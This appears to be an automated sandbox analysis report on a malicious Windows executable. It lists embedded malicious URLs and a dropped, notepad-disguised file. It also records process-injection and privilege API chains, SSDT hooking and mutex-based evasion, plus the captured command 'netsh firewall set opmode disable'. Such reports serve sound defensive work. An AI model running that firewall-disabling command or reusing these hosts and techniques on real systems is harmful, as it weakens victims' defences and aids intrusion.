        Source: LisectAVT_2403002B_38.exe, LisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://macedonia.my1.ru/mainh.gif
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://macedonia.my1.ru/mainh.gif?7231d3=37419295
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://macedonia.my1.ru/mainh.gif?7231d3=374192954
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://macedonia.my1.ru/mainh.gif?7231d3=37419295s
        Source: LisectAVT_2403002B_38.exe, LisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ramoo.w8w.pl/mainh.gif
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://steamboy.h17.ru/U
        Source: LisectAVT_2403002B_38.exe, LisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://steamboy.h17.ru/mainf.gif
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://steamboy.h17.ru/mainf.gif?76caf3=7785203
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://steamboy.h17.ru/mainf.gif?76caf3=7785203L
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://steamboy.h17.ru/mainf.gif?76caf3=7785203j
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.klkjwre9fqwieluoi.info/
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.klkjwre9fqwieluoi.info/abp470n5.sysGetSystemDirectoryAdrivers
        Source: LisectAVT_2403002B_38.exe, LisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.ukikt.org/mainf.gif
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.otzywy.com/
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1522795877.0000000006900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.otzywy.com/?76caf3=7785203
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.otzywy.com/?76caf3=7785203E
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1522795877.0000000006900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.otzywy.com/?76caf3=7785203k
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1522795877.0000000006900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.otzywy.com/?76caf3=7785203om/?76caf3=7785203
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.otzywy.com/d
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.otzywy.com/onia.my1.ru/mainh.gif?7231d3=37419295
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownHTTPS traffic detected: 195.201.126.132:443 -> 192.168.2.8:49712 version: TLS 1.2

        System Summary

        barindex
        PE file has a writeable .text section
        Source: LisectAVT_2403002B_38.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_00407CD0: CreateFileA,DeviceIoControl,CloseHandle,0_2_00407CD0
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_00405680 OpenSCManagerA,SetLastError,OpenServiceA,ControlService,Sleep,QueryServiceStatus,Sleep,QueryServiceStatus,Sleep,DeleteService,GetLastError,Sleep,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,0_2_00405680
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_0040A450 DeleteFileA,DeleteFileA,GetModuleFileNameA,MessageBoxA,ExitWindowsEx,0_2_0040A450
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_0040A4B9 DeleteFileA,GetModuleFileNameA,MessageBoxA,ExitWindowsEx,0_2_0040A4B9
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_0047B8740_2_0047B874
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_004108EE0_2_004108EE
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_0047B8B00_2_0047B8B0
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_004157070_2_00415707
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_0040D7D00_2_0040D7D0
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_0047B7BF0_2_0047B7BF
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_022FCAC10_2_022FCAC1
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_022F56820_2_022F5682
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_022F50110_2_022F5011
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_023064400_2_02306440
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: String function: 00401110 appears 46 times
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: String function: 00410694 appears 48 times
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: String function: 00403E70 appears 234 times
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: String function: 00401C90 appears 56 times
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: String function: 0040C051 appears 35 times
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: String function: 004010C0 appears 42 times
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: String function: 004025B0 appears 66 times
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: String function: 00401820 appears 44 times
        Source: LisectAVT_2403002B_38.exe, 00000000.00000003.1458396386.00000000005CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNOTEPAD.EXEj% vs LisectAVT_2403002B_38.exe
        Source: LisectAVT_2403002B_38.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: LisectAVT_2403002B_38.exeStatic PE information: Section: .ardata ZLIB complexity 0.9961708470394737
        Source: classification engineClassification label: mal100.spre.evad.winEXE@4/4@5/14
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_00401720 GetLastError,_sprintf,FormatMessageA,_sprintf,LocalFree,MessageBoxA,0_2_00401720
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_00404180 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,GetLastError,0_2_00404180
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_02300D40 LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,FindCloseChangeNotification,GetTokenInformation,GetTokenInformation,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,FindCloseChangeNotification,0_2_02300D40
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_00407730 _memset,CreateToolhelp32Snapshot,Module32First,CloseHandle,0_2_00407730
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_00407A40 CreateDirectoryA,CreateDirectoryA,CoInitialize,CoCreateInstance,MultiByteToWideChar,CoUninitialize,0_2_00407A40
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMutant created: \Sessions\1\BaseNamedObjects\wininit.exeM_484_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMutant created: \Sessions\1\BaseNamedObjects\registryM_92_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMutant created: \Sessions\1\BaseNamedObjects\smss.exeM_324_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMutant created: \Sessions\1\BaseNamedObjects\services.exeM_624_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_492_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMutant created: \Sessions\1\BaseNamedObjects\winlogon.exeM_556_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_784_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMutant created: \Sessions\1\BaseNamedObjects\lsass.exeM_640_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_776_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_868_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_408_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_744_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMutant created: \Sessions\1\BaseNamedObjects\Op1mutx9
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_920_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeMutant created: \Sessions\1\BaseNamedObjects\dwm.exeM_984_
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_03
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeFile created: C:\Users\user\AppData\Local\Temp\ipyr.exeJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCommand line argument: UnInstaller0_2_00403A30
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeFile read: C:\Windows\system.iniJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: LisectAVT_2403002B_38.exeString found in binary or memory: o-adddeefea/s
        Source: unknownProcess created: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe "C:\Users\user\Desktop\LisectAVT_2403002B_38.exe"
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall set opmode disable
        Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall set opmode disableJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: srclient.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: spp.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: vssapi.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: vsstrace.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeFile written: C:\Windows\system.iniJump to behavior
        Source: Binary string: notepad.pdbGCTL source: ipyr.exe.0.dr
        Source: Binary string: notepad.pdb source: ipyr.exe.0.dr
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_0047C11B LoadLibraryA,SetErrorMode,CreateFileMappingA,CreateFileMappingA,MapViewOfFile,CreateThread,Sleep,GetModuleFileNameA,LoadLibraryA,GetProcAddress,CreateMutexA,GetLastError,Sleep,ExitProcess,0_2_0047C11B
        Source: LisectAVT_2403002B_38.exeStatic PE information: section name: .ardata
        Source: ipyr.exe.0.drStatic PE information: section name: .didat
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_004106D9 push ecx; ret 0_2_004106EC
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_022F0F51 push ebp; iretd 0_2_022F0F52
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_023078A0 push eax; ret 0_2_023078CE
        Source: LisectAVT_2403002B_38.exeStatic PE information: section name: .ardata entropy: 7.994014875588453
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeFile created: C:\Users\user\AppData\Local\Temp\ipyr.exeJump to dropped file
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeCode function: 0_2_00407FC0 GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,0_2_00407FC0

        Hooking and other Techniques for Hiding and Protection

        barindex
        May modify the system service descriptor table (often done to hook functions)
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: KeServiceDescriptorTable
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Found evasive API chain (may stop execution after checking mutex)
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-25472
